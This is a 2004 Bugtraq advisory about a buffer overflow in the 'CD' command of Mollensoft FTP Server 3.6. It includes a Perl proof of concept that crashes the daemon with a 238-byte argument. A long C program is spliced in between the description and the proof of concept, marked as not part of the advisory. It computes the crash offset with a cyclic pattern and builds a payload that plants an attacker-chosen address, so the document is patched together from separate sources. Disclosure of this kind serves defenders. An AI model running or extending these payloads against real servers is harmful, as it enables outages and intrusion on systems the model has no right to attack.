
List:       bugtraq
Subject:    Mollensoft ftp Server ver 3.6 Buffer overflow
From:       Chintan Trivedi <chesschintan () hotmail ! com>
Date:       2004-05-28 5:38:45
Message-ID: 20040528053845.14885.qmail () www ! securityfocus ! com




[ Mollensoft ftp Server ver 3.6 Buffer overflow ]

-----------------------------------------------------
EOS Advisory - http://www.eos-india.net
-----------------------------------------------------


Vendor         : http://www.mollensoft.com
Version        : 3.6 (latest)
Vulnerability  : Buffer Overflow


About Product 
=============

	Mollensoft Lightweight FTP Server is a powerful, reliable FTP server for Windows95/98/NT/2000. It includes New Security and Faster, More Efficient Rules Based Access, Live Client activity Window as well as a specific Client breakdown window (below) and significant enhancement in speed/stability and is especially designed for Intranet Use!

(direct quote from website)

Description
===========

	A buffer overflow exists in the server's handling of the "CD" command. Passing an argument of 238 bytes overflows the buffer and makes the server read from a memory address taken out of that argument:

ftp> CD AAAAAAA...(238 times)

The ftpd daemon then crashes with the error message:

"The instruction at 0x50e0931f referenced memory at 0x41414141. The memory could not be read."

	Debugging the process shows that the instruction at 0x50E0931F is "CMP BYTE PTR DS:[ESI], 1F" and that ESI holds 0x41414141, i.e. four of the 'A' bytes sent as the CD argument. The overflow therefore overwrites a pointer that the server later dereferences, so an attacker controls the address the application reads from. If that controlled read can be taken further, the vulnerability may allow remote code execution and complete access to the vulnerable system.
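The natural next step after the all-'A' crash is to learn which four bytes of the 238-byte argument land in ESI, because a run of identical bytes cannot tell you. The C program below is an added example and is not part of this advisory or of Mollensoft's code: it generates a cyclic pattern of the crashing length, maps a crash register value back to its offset, and then builds a CD argument with a chosen address at that offset, refusing addresses that contain NUL, CR or LF since those would end the FTP command line early. It assumes an x86 little-endian target and that ESI holds a contiguous slice of the argument, as 0x41414141 suggests; the ESI value used in main() is constructed for illustration, not taken from a real crash.

```c
/* Added example, not part of the original advisory or of Mollensoft's code.
 * Shows the step after the all-'A' crash: find which bytes of the 238-byte
 * CD argument end up in ESI, then place a chosen address there.
 * Assumptions: x86 little-endian, and the crash register holds a contiguous
 * 4-byte slice of the argument. The ESI value in main() is constructed. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define CD_ARG_LEN 238   /* argument length the advisory reports as crashing */

/* Fill buf with the classic cyclic pattern Aa0Aa1Aa2...Ab0Ab1...: no 4-byte
 * window repeats within the first 20280 bytes, so the dword that lands in a
 * register pinpoints its offset, which a run of 'A's cannot. */
void cyclic_pattern(char *buf, size_t len)
{
    size_t i = 0;
    for (char a = 'A'; a <= 'Z' && i < len; a++)
        for (char b = 'a'; b <= 'z' && i < len; b++)
            for (char c = '0'; c <= '9' && i < len; c++) {
                const char triplet[3] = { a, b, c };
                for (int k = 0; k < 3 && i < len; k++)
                    buf[i++] = triplet[k];
            }
}

/* Map a crash register value back to its offset in a cyclic pattern of
 * pattern_len bytes. Returns -1 if the value does not come from the pattern. */
long pattern_offset(uint32_t reg_value, size_t pattern_len)
{
    char *pattern = malloc(pattern_len + 1);
    if (pattern == NULL)
        return -1;
    cyclic_pattern(pattern, pattern_len);
    pattern[pattern_len] = '\0';

    /* The register was loaded little-endian, so undo the byte order. */
    char needle[5];
    for (int k = 0; k < 4; k++)
        needle[k] = (char)((reg_value >> (8 * k)) & 0xff);
    needle[4] = '\0';

    const char *hit = strstr(pattern, needle);
    long off = hit ? (long)(hit - pattern) : -1;
    free(pattern);
    return off;
}

/* Build the CD argument: 'A' filler with addr written little-endian at
 * offset, NUL-terminated, total_len bytes long (out must hold total_len + 1).
 * Returns 0 on success, -1 if offset leaves no room for 4 bytes, -2 if addr
 * contains NUL, CR or LF, which would cut the FTP command line short. */
int build_cd_payload(char *out, size_t total_len, size_t offset, uint32_t addr)
{
    if (offset + 4 > total_len)
        return -1;
    for (int k = 0; k < 4; k++) {
        unsigned char byte = (addr >> (8 * k)) & 0xff;
        if (byte == 0x00 || byte == '\r' || byte == '\n')
            return -2;
    }
    memset(out, 'A', total_len);
    for (int k = 0; k < 4; k++)
        out[offset + k] = (char)((addr >> (8 * k)) & 0xff);
    out[total_len] = '\0';
    return 0;
}

/* Build a payload and read the dword back the way the CPU would.
 * Returns 1 if the address round-trips, 0 if not, or build_cd_payload's
 * error code when the payload cannot be built. */
int payload_selftest(size_t offset, uint32_t addr)
{
    char payload[CD_ARG_LEN + 1];
    int rc = build_cd_payload(payload, CD_ARG_LEN, offset, addr);
    if (rc != 0)
        return rc;
    uint32_t back = 0;
    for (int k = 3; k >= 0; k--)
        back = (back << 8) | (unsigned char)payload[offset + k];
    return (back == addr && strlen(payload) == CD_ARG_LEN) ? 1 : 0;
}

int main(void)
{
    /* Constructed: the ESI value a crash would show if the CD argument had
     * been the cyclic pattern rather than 238 'A's. */
    uint32_t esi = 0x37614136u;  /* little-endian bytes "6Aa7" */
    long off = pattern_offset(esi, CD_ARG_LEN);
    printf("ESI = 0x%08x -> offset %ld in the CD argument\n", esi, off);
    printf("0x41414141 -> offset %ld (an all-'A' input cannot be located)\n",
           pattern_offset(0x41414141u, CD_ARG_LEN));
    if (off >= 0)
        printf("payload with 0x10203040 at offset %ld round-trips: %d\n",
               off, payload_selftest((size_t)off, 0x10203040u));
    return 0;
}
```

Replace the 238 'A's in the proof of concept with the output of cyclic_pattern(), read ESI from the crash dialog, and pattern_offset() gives the position to overwrite; build_cd_payload() then produces the argument that makes the server read from the address you choose.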

Proof Of Concept
================

#!/usr/bin/perl
# POC for mollensoft ftp server 3.6
# Will crash the daemon
# (the advisory ran it with ActivePerl on Windows: C:\Active Perl\perl)

use strict;
use warnings;
use IO::Socket::INET;

my $host   = "localhost";
my $port   = 21;
my $buffer = "A" x 238;    # 238 bytes: the length that triggers the overflow

my $socket = IO::Socket::INET->new(
    Proto    => 'tcp',
    PeerAddr => $host,
    PeerPort => $port,
) or die "cannot connect to $host:$port: $@\n";

# Read and echo the 220 greeting first so each later reply lines up with its command.
$socket->recv(my $banner, 100);
print $banner if defined $banner;

# Send one command line and echo whatever the server replies;
# once the daemon has crashed, recv returns nothing.
sub send_cmd {
    my ($cmd) = @_;
    print $socket "$cmd\r\n";
    $socket->recv(my $reply, 100);
    print $reply if defined $reply and length $reply;
}

send_cmd("USER root");
send_cmd("PASS password");
# The overlong argument is sent with the literal verb "CD" as in the advisory;
# the RFC 959 verb that an ftp client's "cd" actually sends is CWD, so try
# that spelling too if this one does not bring the daemon down.
send_cmd("CD $buffer");

close($socket);


Credits
=======

Chintan Trivedi - chesschintan [at] hotmail.com 
http://www.eos-india.net
Eye on Security Research Group - India

